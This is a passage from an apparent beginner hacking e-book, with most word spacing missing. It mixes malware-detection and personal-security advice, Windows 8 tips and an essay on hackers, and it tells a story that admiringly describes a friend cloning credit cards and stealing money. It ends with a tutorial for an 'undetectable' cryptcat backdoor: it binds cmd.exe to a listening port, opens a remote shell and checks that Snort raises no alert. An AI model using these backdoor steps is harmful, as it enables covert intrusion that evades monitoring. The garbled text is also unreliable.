Someofthemaliciousfamilycan’tbedetectedwithNetstatbutyoushouldtryitbecause some versions are detectable and you never know what is under yourpossession.

Install Wireshark program which can help you in checking the internetconnectionswhichisautilitythat identifieseverythingthat isgettinginandoutthecomputer.ItislesspossibletobecontrolledbythemalwarebecausecomparedtoNetstatthisisnotaWindowstool.Afteryouinstallitopenitandletitspotallthepacketsthataretravelinginandoutyoursystem.

Hackersusehighnumberportswhen theyaremanipulating so search forportsbetween 1500 and 60000. It will appear on one of those ports if you havemaliciousstuffinyourcomputer,checkingtrafficthatleaveyoursystemisalsoagood idea. To see the traffic from your system createafilterinWiresharkbywritingitinthefiltermenu,typethisafterip.src==PUTYOURIPHERE.

Thefiltercreatedisgoingtoshowyoutrafficonlyfromyoursystemandthat’swhyyourIPisrequested.Writeintoyourfilter’swindowthisip.src==PUTYOURIPHEREandifthesyntaxisrightitshouldswitchfrompinktogreen.

AfterthispleaseclickonApplybuttonandlookforunusualtraffic(themaliciousone) and if youdetect somethingunusualplease contact a specialist inorder tohelpyouasfastasyoucandoit,maliciousfilesaresohardtofindbecausehackersallovertheworldcreatenewversionsalmosteveryhourwhilevirusesarenotthateasy tomake and this is themain reasonwhymalicious family hitsmore oftenthan ever, because it is so diverse. Systems as Linux and OS are even morecomplicatedandyouneedtobeamasterinthedomaininordertodiscoverthatthey are infectedwith something but themain advantagewith those systems isthattheyareimmunetomosttypesofattacks,butnottoalltypes.

*NOTE: this method itself is a challenge, if you choose this method please bepatientandcareful,doeverythingwithamaximumofattentionandcheckyourtraffic listmore than once tomake sure you will detect if there are any of themaliciousfamilymemberscaptiveinyoursystem.Evenifthismethodisalittlebitharderthantheotheronepresenteditisveryefficientandworthtotry.

HowtoprotectYourselfFromHacking

Prevention is literally alwaysbetter than cure, it is better to avoid anunwantedsituationandeveryonecandoitwithalittlebitofattentionanditmightrequestaninvestment,butalwaysrememberthatcurepricesarehigherthaninvestments.Why not keep your body healthy by making an investment in some vitaminsinsteadofgettingillandpayalotofmoney,physicalandpsychicaleffort?Youcanavoida lotof things.Protectingyourcomputer fromall typesofhacking isveryimportantforyouandforyoursystembutfewarethosewhoknowhowtodoitandtheirnumberisdecreasing…

A high number of attacksmake the internet to look like it is holding a horrormoviestorynowadaysduetothebignumbersofcybercriminalsandtheirattacks,keepingyourdevicehealthyiscrucialinthebattleagainsthacking.

Parents are advising you because theywant you to be happy, this book has thesametask.

Makesurethatyourcomputerisnotamagnettohackersduetoitsvulnerabilitiesandalwayscheckonnewupdatesandinstallthem,don’twaittoomuchbecausehackersarealwaysready.

The first things you should take attitude and protect your computer from areviruses;thereareseveralwaystocategorizevirusesandeachonecomeswithitsownnames.Therearemacroviruses,worms,backdoorsandTrojansarethebestknownandexperiencedat themoment.Thesevirusesmultiplyoverthe internetandmalicious websites or other sources to infect the computer. Others spreadthoughdevicesthatareallowingyoutowriteinformationandreadinginsuchasUSBmemorysticksandexternalharddrives.Viruseshavethreemainfunctions:infect, destroy or damage data on your machine together with information onexternal drivers.Hackers can also use your computer as a hackingmachine byinfecting itwith virusesbut luckily there aremany tools thathelp youkeep thesituationundercontrol.

Anti-virus software highly respected and appreciated by experts is Avast whichhasaregularsetofupdatesanditiseasytouseduetoitsdesign.

SomeusefultipsbelowtoincreaseyourAV’syield:

Installonlyasoftware.

MakesureyourAVsoftwareupdatesautomatically,thiswilltake

worriesaway.

Ensurethatyoursoftwareacceptsupdates.

Checkyourcomputer’ssituationatleastonceaweek.

Makesurethatthesoftwareisalwaysrunning.

Howtoavoidinfections?

Be very careful about what files you choose to open and download from theinternet, it isrecommendedtodelete immediately files fromunknownpeopleororganizations after you receive them. Risks are at every step, so take them inconsiderationbeforeyouburnaCDorrunaUSBstickintoyourcomputer.MakesureagainthatyourAVsoftwareisrunningbeforeyouinsertthem.

Virus creators donot usually target free and open source software and you canavoidsomeinfectionsbyswitchingtothiskindofsoftware.

Spyware is another thing you should be aware of. Spyware is belonging tomalicioussoftwarefamilyanditisusedbyhackerstotrackyourworkandtoallowthem get the information they want from you. This software is capable ofrecording your mouse movements; collect the words you write, the pages youenterand theprograms thatbelong toyou.Asaneffectof thepreviousactions,hackers can break your security and gain personal data about you and in somecasesaboutyourcontactsaswell.Machinesbecomeinfectedwithspywareinthesamewaytheygetinfectedwithviruses.Reviewyourbrowser’ssettingsandmakesuretheyaresecure.

Anti-Spyware tools are very welcomed to protect your computer and Spybot iswhatyouneedbecause it iscapableof identifyingandremovingknowntypesofmalware.

Preventthistypeofinfectionsbyfollowingthenextsteps:

Readeverythingthatshowsupinyourfacecarefullybeforeclickingok

oryes.

Neveraccepttoruncontentfromunbelievablesources.

Gettingafirewallisalsoimportantbecauseitisthefirstprogramthatknowstheincominginformationfromtheinternetandthelastonetocontroloutgoingdataas well. With a firewall you do not have to pay attention to the incoming andoutgoinginformationisnotimportantanymore.

A high quality firewall will ask for your permission for each program on yourmachine.Whenoneofyourprogramsistryingtocontacttheoutsideworldyourfirewallwillalertyouandaskyouifyoutrustit.Inthiswarbetweenhackersandnonhackerssuchafirewallcouldbeusedasyourfrontofdefense.

Toavoiduntrustednetworkconnectionsyoushould:

Installonyourmachineonlytheprogramsyouneedanddownload

themrightwiththeirlicense.

Donotgiveyourpasswordstoanyone.

Ifyoudonotneedaninternetconnectionpleasedisconnectyour

machine.

Shutdownyourcomputeratnight.

Ensurethatallthecomputerswhichbelongtoyournetworkhavea

firewall.

Getaneasy-to-usefirewall.

Keepingyourcomputerup-to-dateisveryimportantforyoursecurity,youshouldupdate everything on your computer starting from your operating system andending with the programs you use. Updates are required regularly on everysoftware.

Also, stayup-to-datewithFOSS (FREEANDOPENSOURCESOFTWARE)andfreeware tools. Try out them to any propriety software used by you; pay extraattentiontounlicensedprograms.

These tools are built by experts who belong to non-profit organizations orcompanieswhichupdatethemfrequentlyfreeofcharge.

NumerousFREEANDOPENSOURCESOFTWARE(FOSS)applicationsmaybesimilartoeachotherandworkinthesamewayonlywithsmalldifferences.

StudiesprovidethatgettingawayfromtheMicrosoftOfficeoperatingsystemandmovingtoFFOSalternativenamedGNU/Linuxismoresecureanditishealthierforyourcomputer.Andremember,preventionisbetterthancure!

Thosearenottheonlywaystopreventattacks;lifeisfullofoptionsateverypointofitsoprotectionisaswellfullofoptionsateverypoint.

In order to increase your system’s security you can follow the next advices butkeepinyourmindthateverythingispossibleandthatthereisnotanyhardwareorsoftwarewhichisimpossibletohack.

Astrongpasswordisoneofthefirststepsyoushouldmakeinfollowingyourroadtoprotectionbecauseithelpsonsecuringyourinformation.Itisrecommendedtorepeat combinations of random alpha-numeric characters such as numbers,symbolsandlettersthatwillbemorethanelevencharacters.Toreducetherisk,pleaseuseapasswordmanager.Evenifyourpasswordisoneofthemostsecuredin theworlddonot forget topay extra amountof attention to thewebsites youvisit.

Two-Factor Authentication is very important and they have a positive effect onyou. Websites and companies which respect their customers and services willprovide such an option. Let’s take as an example Twitter, if you have a twitteraccountandyoutrytologinfromanunknowndevice,aftertypingthepasswordtheysendyouamessageonyourphonewithaverificationcodeyoushouldenterinordertoaccessyourtwitteraccount.Suchoptionsalerttheusersexactlywhensomeone tries to get into their account. This option is used also by Apple,Microsoft,GoogleandDropbox.Toget fulladvantageof thisoptionsetupyoursettingscarefully.

Never back up sensitive information on your phone using the internet, just

ordinary activities and nothing more than that. Keep sensitive documents andimages of all external servers which mean you will not allow applications likeiCloudorFlickrandotherstoautomaticallyuploadinformationtotheirstorage.

And to resolve this problem create an external drivewhich youwill only accesswhenyouarenotconnectedtotheinternetandkeepthesensitivedatathere.

Also,youshouldnotlinkaccountsbecausehackerscantakefulladvantageofthisactionandcompromiseeverythingthatbelongstoyoubyproxy.Nowadays, it isreallytokeepaccountsfarfromeachotherduetosocialmediawhichhadastrongimpactonsociety.Checkwhichapplicationsyouhavelinkedinthepastwithyoursocialmediaaccountsandremovethemifyouarenotusingthem.

Choosingahard-to-guesssecurityquestionmightsaveyoufrombeingahackingvictimaswell,but inthecenturyofsocialmediawebsiteswhereeverypersonissharingeverythingisnotmakingsenseforthem,butforthosewhoarealittlebitmysteriousandkeeptheirpersonaldetailsawayfrompeoplemightbeasolution.

Even ifyouareextrovertedandyoushareeverythingaboutyou,answeringwithstupiditymightincreaseyoursecuritylevel.

Don’tforgettoprotectallyourdeviceswithpasswords.Itisamusttodowhenyouget a new device such as a phone or tablet, you should secure it with a goodpassword.Changingyourpasswordsoftenisalsoanideatotakeinconsiderationduetothedailydiscoveriesofthehackers.Bygivingimportancetoyourdevicesyoualsogiveimportancetothecontactsthatare“stuckin”there.

Ifyouhaveadomainnameyoucanchoosetoprivatizeyourwebsitebecauseonceyouhaveadomainnametherearebigchancestoaccessyourdatawithouteffort.Privatize your domain registration by going to the usually used domainregistrationsite,loginandsearchfortheoptionthatallowsyoutoprivatizeyourdataandifthisoptionseemstobehardtofindorinexistentpleasecontactthesiteandletthemguideyouthoughtheprocedure.Thisoptionmightrequestfeesbutitisdefinitelyworthit.

Clearingyourbrowserdataisalsoanactionyoushouldoftendoandnotonlyonyourcomputer,onallthedeviceswhichareunderyourpossession.Browserskeepeverything about your online activity and collect records of every site you havevisited,datasuchaswhatyoudownloadorsendcanbestockedforweeksandthehackerstakefulladvantageofthisbystealingyourrecordsofonlineactivity.

Trytoavoidpubliccomputersbecausehackersusethemtochallengetheirselvesoftenandyoushouldkeepoutoftheirgame.

Using“hyper-texttransferprotocolsecure.”–HTTPS,itissimilartoHHTTPwhichpeopleusetoenterinternetaddresses.HTTPSisgivingyouanextralevelofsecurityandencryptionwhenyouareusingtheinternet,thedataisalsovalidatewhichmeansthatHTTPScanshowyouifthewebsiteiseitherfakeororiginal.

Free Wireless access is nice and helpful, but check twice the connection you

choosebecause freeWi-Fi is theeasiestway tohacksomething,hackerscangeteverythingfromyourdeviceiftheyareconnectedtothesamenetworkasyoudo.

Becarefulwhichconnectionsyouchoose,somehackersspeciallymakeonesfortheirfuturevictims,ifyoureallyneedfreeWi-Fimorethananythingthenmakesureyouareconnectingtoaserioussource.

Updatesaregoodtohaveandverywelcomedinyourlifeandonyoursystems,theworld is changing second by second and there is something new that shows upsecondbysecond,ofcourseyoucannotseeandtakefullbenefitofeverythingthatgoesoninthebothvirtualandrealworldsbutyoucantryatleasttokeepintouchwithinnovationbytryingeverythingnewthatfrontsyou.

If updates were not as important as they are, maybe this would have a hugeimpactonindividuals,organizationsandonsocieties.Updatesaretherealproofwhich indicates that there are brightminds that think for everyone and find asolutionforeveryproblem.

By following the advices and methods given you will be in a process of mindgrowingwithahighlevelofsecurityguaranteedbythemethodsandadvices.

CHAPTER5:ADVANTAGESANDDISADVANTAGESOFBEINGAHACKER

Despite that every action has a reaction, every action has advantages anddisadvantages.Ifyoudecidetodoanactionyoushouldassumebothsuccessandfailureandbothadvantagesanddisadvantages.Thereisnoperfectionintheworldsoitisimpossibletofindanythingthathasonlyadvantagesorsomethingthathasonlydisadvantagesbecauseanythingshouldhaveabalance.

Ifyouareanethicalhackeryoushould take fulladvantageof thesituationsyouare in because youhave to tailor different solutions for different problems, youcannothaveastandardsetofactionsoyouwillcreateaplanforeveryhackandyourplanshouldcontainthenextequipment:

1. Givedetailsabouttestingintervals

2. Givedetailsabouttestingprocesses

3. Identifyallthenetworksthatyoushouldtest

4. Gettheplaneapprovedbecauseyouareworkingwithpeople.

And if yourplan is successful youshouldbeveryproudofyourselfbecauseyouwillsaveandprotectabignumberofpeopleincludingyourfriends,familyandingeneral everyone you love, you should be proud that you are giving a hand inbuilding your country’s security! Another benefit if you are passionate abouthacking and you really love what to do is being paid for it and getting yourfreedomguaranteed.

Also,other categoriesofpersons takeadvantagemore thanhackers ifwe talkedabout ethical hacking because ethical hackers are fighting constantly withterrorismandtheattackswhichattempttothenationalsecurity.

The advantages and disadvantages problem has two big answers: if you seehackingadvantagesanddisadvantagesfromthehacker’sangleorifyoulookattheadvantagesanddisadvantagesfromthepublicoptionangle.Themainideaisthatwhatisanadvantageforahackerisadisadvantageseenfromtheotherangleofthepublicopinionanditworksviceversa.

So,weremainunder theethicalhackingexampleand ifanethicalhacker isnotpaidattime,hecouldsendyousomemaliciousfileorhecandoanattackbecausehe is skilled in order to get money and you as a company or organization aredisadvantaged.Hackersknowallyoursystem’sflawsandvulnerabilitiesandtheycanuseittodestroyyou.Ontheotherpart,ifeverythinggoesonasitissupposedto;youwilltakeadvantagefromethicalhackingbecauseyoursystemwillbemoreimmune to attacks. Another disadvantage for your company or organization isthatthehackerknowsallyourfinancialdataandIdonotthinkitwillendupgoodforyouifyoumakethemmad…

And if your hacker ismaking amistake your company is always paying for his

mistakebutyouaretheoneswhohavehiredhim.

Andnowlet’smovefromtheparticularexampletoageneralone,hackersareveryadvantagedbecausetheyhavethechancetotesttheirabilitiesandtheyalsolearnhowtoworkindependentlywhileforacompanythisisadisadvantageespeciallyifit isabigcompany, it could turnanytime into the testingorhackingarea if thehackerswantto.

A disadvantage for you as a hacker is if anyone else know about your activitybecausebeingifyouarenotinethicalhackingthenyouhavebigchancestogetafreetriptothejailandmaybeasentence,whilethepeopleyouknowcanplayonyouhowevertheywantbecausetheyknowaboutyour“hidden”activities,soasahackerbewareofwhoyouallowtostayaroundyoubecauseyouneverknow.

Asahacker,youcanalwaysgetbasedonpeople’smistakesandwiththeirsecurityproblems,whileviceversainthiscaseisnotpossibleexceptiftheotherpeoplearehackerstoo.

Another advantage hackers get from you is that via computer hacking they cancontrol yourmachine and dowhatever theywant towith themachine orworstthanthat,MonsterHackerscanletyourmachinebecometheiroperatingmachineandifauthoritieswillfindoutthehackguesswhowillpay?Youwilldoitdefiantlybecause the hack ismade from yourmachine. Another thing hackers can do isshuttingoutthesystemsofthevictimsandattacktheirvictim’ssystembysendingvirusesandwormsto itwhilenonhackersarenotcapableofdoingthisbecausetheyarenotskilled.

Thereisacategoryofhackerswhichisbasedonsocialengineering,guesswhowillhelp those hackers get their goal? The victimwill do it by clicking the infectedlinks,filesordocumentstheyreceiveviaemail.

Other hack operations like stealing passwords, sensitive data such as emailaddress,moneyorphotoscanbeperformedbyhackersandnonhackershavenochancetosucceed.

Atthemainadvantagethatnonhackersgetfromhackers iswearingaformofalesson because you can learn from hackers that there is no 100% securetechnology and you can also switch the situation in your advantage by usinghackerstohelpyouinproblemsassensitivedatarecoverbuthackersaretheoneswhocanharmyourprivacyatthesametime.

Ifrightnowabattlewouldstartbetweenhackersandnonhackers,thevictoryisforhackersbecausetheyarealwaysinformedandreadytoactionwiththeirskills.

As a hacker you are always under mission so you keep your mind active,somethingthatnonhackerscannottakeadvantageof.

So, seeing theadvantagesanddisadvantagesof theproblem isahardoperationbecause there are two sides that are taking advantage of the others sidedisadvantage and that is how it works in general, but if you have well based

packageinformationandskillsyoucanturnthesituationinyourfavoranytime.Itall depends on vision and onhowhackers andnonhackers can redirect such aproblem.

CHAPTER6:HACKINGTOCHANGETHEWORLDPOSITIVELY

AnAnonymHackerWhoCouldSavetheWorld(basedonrealcase)

“Thepastisaforeigncountry;theydothingsdifferentlythere.”thatiswhatL.P.Hartleysaidonce,andtakingalittletimetothinkaboutthisquotewasdefinitelyoneof thebestdecisionseverbecause it is really surprisinghowyourbraincanmakeconnectionswiththerealityaroundyou,sometimesyoufeellikeeverythingisgoingcrazyandyoudonotunderstandanythingjusttakeafewhoursandthinkaboutit,thesolutionalwaysexist.

This quotemademe remember about an old childhood friend,wewill call himMisterRinthisstory.IhavemetMr.RinaparkinRomania,thishappenedwhenwewerebothatageof6,sixteenyearsago.IandMr.Rwereassociatedinmakingsandcastlesofsandinthepark;wewerethemasterstherebecauseeveryoneknewwhowere the authors of the castles which were fillingmore than a half of thesand’sareainthepark.IwascomingwiththeformsandMr.Rwasbringingwaterandshovel,thatwasourmixtobuildourfamouscastlesandthinkingaboutthosetimesmakemefeelliketheyhappenedamillionyearsagoinanotherlife.

Afterbuildingourfamouscastles,wewereoftentemptedabouttheideaofgettingtogetherandwatchingcartoonssuchasDexter’sLaboratoryatMr.R’shouse,wearestillfascinatedabouteverythingthanmeanstechnology,devicesandmachinesand about how do theywork. But destiny did notwant us to continue growingtogethersoweseparatedbecauseIhadtogotomynativecountry.RomaniawasformejustforholidaysandmybeautifulfriendshipwithMr.RwasconsumedinthesummermorethaneverbecauseweweremeetingonlyinthesummerswhenIwascomingtoRomania.

Timeflewsofastandwebecamealmostteenagers,thebiggesttrendofthattimewastohaveanemailaddress,andbecauseIandMr.Rlovedtechnologywehavegot our first addresses when we were in the period between puberty andadolescence.ThoseemailaddressesweretheonlywaytocommunicatewithMr.Rand as a result we both started to spend days and even weeks in front of thecalculator. Special connections exist between people and they are just like theconnectionbetweenarouterthatisgivinginternetandacomputerthatitisusingit,bothofthemknowallthedetailsabouteachother.ThesamewashappeningbetweenmeandMr.Rbecauseevenifwedidnottalkfordayswealmostknewwhatiseachoneofusthinkingabout,IknewwhatMr.RwasthinkingaboutandMr.RknewwhatIwasthinkingaboutaswell.Istillrememberhowexcitedwewerebothofuswhenwewerehearingthatanewprogramisgoingtoberealizedoraboutanewdevicethatisgoingtobeonsale.Technologykeptourfriendshipactivethroughthetimeandwewereusingtechnologyinordertotalkaboutit,IwastellingMr.RallthenewsandupdatesIknewaboutthetechnologyandviceversa.

OurfavoriteplaceinthisworldisTechnischesMuseumWien,Austriabecauseitisthe right place to see the evolution of machines from the oldest times to thecurrent times, you can see from old trains and electricity devices to the latestmodelsofTeslacars,youcanseefromairplanessuchasDiamondDA42toPistonsteamenginesandoneof thebiggest technologyrange in theworld.Forus, thetrip was just like paradise because both of us were feeling like home in thatmuseum.

InthattriptoAustria,onourwaytohome,Mr.Rwasbehindapersonthatwaswhispering to his friend about how successful he is in hacking and about howmuchmoneyheearnsmonthlydoingit.

Afterwebotharrivedfromourtrip,IwenthomeandMr.Rwentdirectlytothelibrarysayingthatheneedssomethingurgent,I felt thatsomethingisnotgoingonasitshouldbutIdidn’tpaymuchattentionandIregretitnow.

Onhiswaytothelibrary,Mr.Rwaswalkingveryfastbecausethisisaneffecthegetswhenhehasagoodideaandinamomentofinattentionhehasgotintoacaraccident.IhavegottheblacknewsfrommysisterwhowasworkingasadoctorinthehospitalwhereMr.Rspentalotoftime.

Iwent to seeMr.R’s situation andwhen I saw him I felt very guilty because Ididn’tstophim,butinmyheadwassomethinglike“seriously?WillIkeeplistentoallmyfeelings?Therearemoreimpornatthings”.Morethanthat,Ihadtogotomycountry2daysaftertheaccident“abandoning”Mr.Rinthehospitalevenifhewasn’taloneatall.Mr.Rstayedincomafor3daysandafterthe3days,hewokeup.

Iwashome,feelinghorribleaboutthesituationwithMr.RandIdidn’ttalktohimverymuchuntilwemetagaininthesummer.WhenIsawMr.Rinthesummer,his behavior has suffered modifications; he was spending most of the time athomesayingthatheisstudying.IcalledhimintheparkwehavemetforthefirsttimeandIdecidedtotalkopenedtohimaboutallthesituationabouttheaccidentand fortunately, our connectionwas establishedagainbecausehedecided todothesame.Dopeopleworklikemachines?!

ItoldMr.RthatIwasfeelingguiltyaboutwhathappenedandaskedhimwhyhewenttothelibraryinthatdayanddidn’tpayattentiontothecarsaroundhimandMr.R answered “Iwent to the library because Iwanted to get amanual abouthacking.IwaswalkingfastandIforgottopayattentiontothecarsbecauseIwastoodistractedbymy idea, I felt like extranatural forceswere controllingme atthatmoment” and our discussion continued until the rain started, and becauseMr.R’shomewasclosertotheparkthanmine,webothdecidedtogothere.

WhenIarrivedatMr.R’shouseIfeltlikebeinginDexter’sLaboratorybecausethereweredifferentkindsofmachines,onePC,twolaptopsandsomepapersthrownonthefloor.IdidnothavetoaskbecauseMr.Rstartedtotellmeeverything,hesaidthatinhiscomaperiodhehadavisionabouta“futurelife”

andafterhehasgotoffthehospitalheboughtmachinesthatwerecloningcreditcardsandstartedtousethem,hehadalotofCD’sandhetoldmethatheisofficiallyastudentattheITUniversityinourtown.Mr.R’shackingoperationsweresuccessful,hiscardcreditclonesworkedundetectedandhestartedalsotomakemoneyfromhackingtransferringmoneytohisaccount.ItwasalittlebitSFformetoseehishousetransformedbuthowever….

Yearswere goneandMr.Rhas just finishedhis studiesbutneverworked legalusing his Diploma, he were saying that he is making more money from thoseoperationsandhedoesnothavetoworkanymore.Hebecamefamousinthetownacross the timeandhis intelligencewasexploreddaybydayandhewas sayingthathehasmoneyinaccountsallaroundtheworld,allmadefrom“business”.

Onedayhedecidedtothrowapartyatoneofhisresidences,becauseheboughtmorehousesafterhehasgotfullofmoneyandlocalauthoritiesknewabouthimand his abilities but he was too undetectable and they did not have any proofabouthim.So,athispartypeople feltgreatbut theneighborsdidnot feelgreatbecausethepartypeopleweretoonoisyandtheyweretoooldsotheycalledthepolice,andthepolicecan’twaitedforsuchamoment!TheyhavegotMr.Rintheprison forbreaking thepublicdiscipline lawsbutMr.Rwas too smart for suchcheapactions,infact,gettinghiminjailwasagamecontrolledbybigpowersandinstitutions. In the prison,Mr. R has got several offers to work for NASA andsecurity international organizations and the condition to get his freedom againwastoacceptoneofthebigoffers,thatishowhegotoutofthejail,byacceptingother’srulestoplaywithpeople’slivesbutbecauseMr.Risaverycleverperson,ithasaplantoescapefromthemiserablesituationheisinnow.

Mr.R’sabilitiesare consideredveryhighbecause theorganizationheworks fornow(forced)considerhimthemasterpieceinsavingsomesecuritysystems,butMr.Rissmartandhewon’ttellhissecretsandideastooeasy.

Itisfunnyhowothershavethepermissiontobreaktherulesmadebythem!Ourworldissuchadefectonebecausethevulnerabilitieshavebeendiscoveredbutinordertoresolvetheproblem,BigPeopleprefertokeepthemhiddenandtakefulladvantageofthem.

TheonlywaytosaveourselvesfromthosedirtybiggamespoweredbyBigpeoplewhoaresuperiortoeveryoneofusbytheirinfluenceistoopenoureyesandashackersinvesttimeinexploitingvulnerabilities,weshoulddothesameastheydo,weshouldanalyzeflawsinoursystemandmakealltheworldwakeupatthesametime. The question without answer is: If all the people from the world wouldgenerateabigrevolution,whowillwin?Theoneswhogotthepowerortheoneswhoarerightandcanprovethetruthbuttheyarecontrolled?!

Itiseasiertorepairacomputersystemthanaworldwidesystem.

CHAPTER7:HACKINGTIPSANDTRICKS

Tips and tricks about any domain in life are welcomed but a special place isoccupiedbytechnologytipsandtricks,theyhelpyoudoyourworkfasterinsomecasesandinothercasesyoudiscoversomenewfeatureswhichyoudidnotevenknowthatexist,andbecauseweloveupdatesandwelovetotryeverythingnewweare going to start with some tips and tricks about Windows 8 because it isrelativelynewandunfamiliar for thosewho just installed it, soherewego, tipsandtricksbelow:

•UtilizeandhackthePowerUserMenu

Microsoft has all the rights to take or give anything about their programs andsystemsandthisiswhatMicrosoftdidhereaswell,hereisnostartmenu.

ButMicrosoftisprofessionalsotheydeliveredahelpfulnewtoolcalledthePowerUserMenu.So,right-clickinthelowerlefttuskofyourdesktopanditshouldshowupawrittenmenuwhichallowsyoutoaccess16utilitiesandbetweenthemyouwillfindtoolslikecommandprompt,Runboxandanadministrativecommandprompt.Clickon“ProgramsandFeatures”andbydoingthisyoudelivertoyourControlPanelanappletwhichwillallowyoutouninstallyourdesktopprograms,takealookatwhatupdatesyouhaveandswitchcertainWindowsfeatureseitheronoroff.MobilityCenterwilltakeyoutoanappletwhichisgoingtoletyouchangeyourscreenorientation,managebrightnessandalotofothersettings.

Also,somethinginterestingaboutPowerUserMenuisthatyoucanhackit.It isallowingyoutoremovefilesyoudonotwantthereandaddtheitemsyouwanttoappearjustlikealistofmostusedprograms,games,etc.

CheckifeverythingworksasitissupposedtoandmakesurethatyoucanaccesshiddenfilesinFileExplorerandtakeatripto:

C:\Users\<i>username</i>\AppData\Local\Microsoft\Windows\WinX

Andthereusernamewillbeyouraccountname;youshouldfindthreefilesthere.

Every one of it has shortcuts toPowerMenu applications.The first group ( fileGroup1)includestheDesktop;thesecondgrouphasascontenttheControlPanelandTaskManagerandyouwillalsoFileExplorer,RunandSearch;Thelastgroupincludes the two command prompts , device manager, event viewer andeverythingthatwasnotincludedintheothertwogroups.

Ifyou takea lookandPowerMenuyouwillobserve that thereare threegroupsandthosearethefileswhichbelongtoWinXfolder.

InordertomodifythePowerUserMenu,editthecontentsoffoldersG1,G2andG3.Ifyouaregoingtoremoveashortcutitwillfadeawayfromthemenuandifyouaddit,itwillappearimmediately.

Tohideashortcutselect itanhityourdeletebuttonandtoaddanewoneopen

the folder youwant it tobe like ahome for your shortcut and right-clickonanunfilledspotandselectNewShortcutandfollowtheinstructions.

Tofinishtheoperation,signoutofWindowsandthenenteragaintoseeyournewPowerUserMenu.

•Whynotfoolyourwindow’sMailappintoutilizingPOPmail

Asyounoticed,thisWindowsiswaymoredifferentthantheotherversionsandithasalotofsurprisingthingstoexplore.ThiskindofwindowswillnotworkwithPOP3mailprotocolandalltheemailaccountsthatusethistypeofprotocol,itisworkingwithaccountsthatuseIMAP.

YoucanchangethisandmakeanyemailaddresstogetPOP3-basedmailfromaPOP3accountandthensetupyourWindowstogetmailsfromthataccount.

Firstofall,ifyouhaveanOutlookmailaccountthenconfigureittogetPOP3mailbyfollowingthenextinstructions:

1.Loginandclickonthesettingsiconandselecttheoption“Moremail

settings”

2.Youwillfindunderyour“Managingyouraccount”optionanotheroption

called“Youremailaccounts”andafterthatselect“Addasend-and-receive

account”

3.Onceyoudidthis,ascreenshouldpopupandselectfromthatscreen

“Advancedoptions”.

4.Ifyouaregoingtoaccessyourmailfrommultipledevicesensurethatyou

leaveamessageontheserver.

5.Afterthat,youwillbeaskedtocreateanewfolderforthemailorkeepitin

youremailaddress,hereyouarefreetochoosewhatyouwantandafterthat

clicknext.

6.TheywillsendyouaverificationmailtoyourPOPaccount,youmustclick

onthatlinkandyouwillberedirectedtoanOutlookpagethatwilltellyou

thatyouaresetup.

Now,youaredone.

Also,youcanconfigureyourGmailtogetPOP3mailattemptingthenextsteps:

1.OpenyourGmailaccountandselectSettings,afterthatselectAccounts

andimportandnextselectAddaPOP3mailaccountyouown.

2.Ascreenshouldshowup,enteryourGmailaddressthere.

3.Anotherscreenshouldappearhereaswell,givealltheinformationyou

needtoaccessyourPOPaccountandifyoudonotknowitpleasecheckwith

yourmailprovider.

4.Afteryouresolvedtheproblem,clickonAddAccount.Andmakesureyou

tellGmailthatyouwantaswelltosendmessagesfromyouraccountnotonly

getthem.

5.NowyoushouldreceiveaverificationmailonyourPOP3account,clickon

thelinkandfollowtheindications.

ThelastthingtodoisrunningWindows8Mailapp,inordertodoitpleasehittheWindowskeyonyourkeyboard+CandWindowswilldisplayCharmsbar,onceyouseeitselectSettings,nextselectAccountsandAddanaccount.

InordertogetmailfromOutlook.com,selectitonthescreenandenteryouremailaddressandpasswordandclickConnect.TogetaGmailmailselectGoogleonthescreenandtherestisthesameasinOutlook.comcase.

Enjoythenewsettings!

So, as we all know now, DDoS attacks are very frequent and their number isgrowinghourbyhour,soherearesometipstohelpyouavoidaDDoSattack:

•BeforetakinganymeasuresyoushouldunderstandwhataDDoSattackis.DDoS(distributeddenial-of-service)attackshappenwhenattackerstrytocompromiseacomputerbymakingitsrecoursesinaccessibletoitsuser.

• In order to protect your computer, buymore Bandwidth because in this casemoreisbetter.

Makesureyouhaveenoughbandwidthonyourownweb.ThisallowsyoutotackleunsophisticatedDDoSattacksbygettingmorebandwidthtoservetherequests.IthelpsalotbecauseaDDoSattackissuchacapacitygame.

•ChooseDDoSmigrationservices;youcanrequestitfromyourinternetprovider,itisbettertosearchfortheproviderthathasthelargestDDoSprotectionnetwork.You can also utilize a DDoS prevention piece of equipment which could bespeciallycreatedtopreventDDoSattacks.

•Restrictyourconnectivity!

Ifyouhavecomputerprograms/systemswhichareinadirectconnectionwiththewebinstallafirewallbecauseitisofferingyouaplusofprotection.

Hackingissuchanenjoyableactivity,butifyouwanttohackmakesureyouwillbeundetected,ifyoudonotknowhowthenthisbookhasananswerforyou.DoyouknowhowtomakeanearlyandundetectablebackdoorusingCryptcat?It isfuntolearnandapply,ifyouwanttodoitpleasefollowthenextdirections:

First,youhavetosearch,downloadandinstallCryptcatonyoursystemwhichisanencryptingnetcatandyoucangetitbutitisalittlebithardertofinditontheinternetsohereitisthelinkhttp://sourceforge.net/projects/cryptcat/files/.

The communication between two devices is encrypted using twofish which is agreat algorithm, the encryption is on par with AES one making it nearlyimpossibletofind.

Afteryou install it,move to thenext stepbyopeningaListeneronyour systemwith a similar syntax to netcat, in the following example we will open it on awindows7onport6996:

cryptcat-l-p6996-ecmd.exe

andthecommandpromptwillshow:

C:\nt>cryptcat-1-p6996-ecmd.exe

ThenextstepisopeningSnotoranyotherIDS,youshouldstartituponanothersystem which will stick together with the Windows system to check if theencryptioniscapableofblindingtheIDS,becausewewanttokeepourinvisibletothesecuritysystems.

root@bt:~#snort-dev-c/etc/snort/snort.conf

Next,connect thesystemwithCryptcat fromyourBackTracksystemandfullanencryptedbackdoorconnectionthatisnotpossibletofind.

cryptcat192.168.4.182.2486996andthenextwillbedisplayed:

root@bt:~#cryptcat192.168.182.2486996

MicrosoftWindows[Version5.2.3790]

(C)Copyright1985-2003MicrosoftCorp.

C:\>

Ifsomethingsimilartotheabovepopsupthenyouareontherightwaybecauseyou have just connected to the system and received a command shell from thesystem.

Tocontinue,seewhatisgoingonwithyourSnortLogsandAlertbecausethistypeofattackusingacommandshellpassedacrossthelineisdetectableusingSnortorIDS’siftheconnectionisencryptedatthatmoment.

Snortrulesaresendingalertstotheadminthatacmd.exeshellistravelingacrosstheirnetworkconnectionbutwithyourencryptedconectionincryptcatitshouldbeimpossibletodetect.

Check your alerts and logs in Snort, if everything is going on as it should youshould not get any alerts on the subject of command shell. In order to besuccessfulyoushouldconnecttothesystemwithoutgettinganykindofattentionfromsecuritysystems.

